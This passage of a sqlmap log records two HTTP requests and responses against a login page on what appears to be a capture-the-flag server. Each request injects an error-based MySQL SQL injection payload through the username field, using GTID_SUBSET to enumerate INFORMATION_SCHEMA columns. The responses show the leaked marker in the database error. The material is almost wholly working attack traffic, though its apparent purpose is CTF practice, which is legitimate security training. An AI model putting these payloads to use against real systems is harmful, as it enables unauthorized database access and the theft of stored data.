<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#38]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 317
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f5441424c45535041434553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1915%29--%20rqUU

HTTP response [#38] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#39]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 315
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x494e4e4f44425f5359535f5441424c455354415453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C8613%29--%20OxKk

HTTP response [#39] (400 Bad Request):
Date: Sun, 08 May 2022 20:50:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

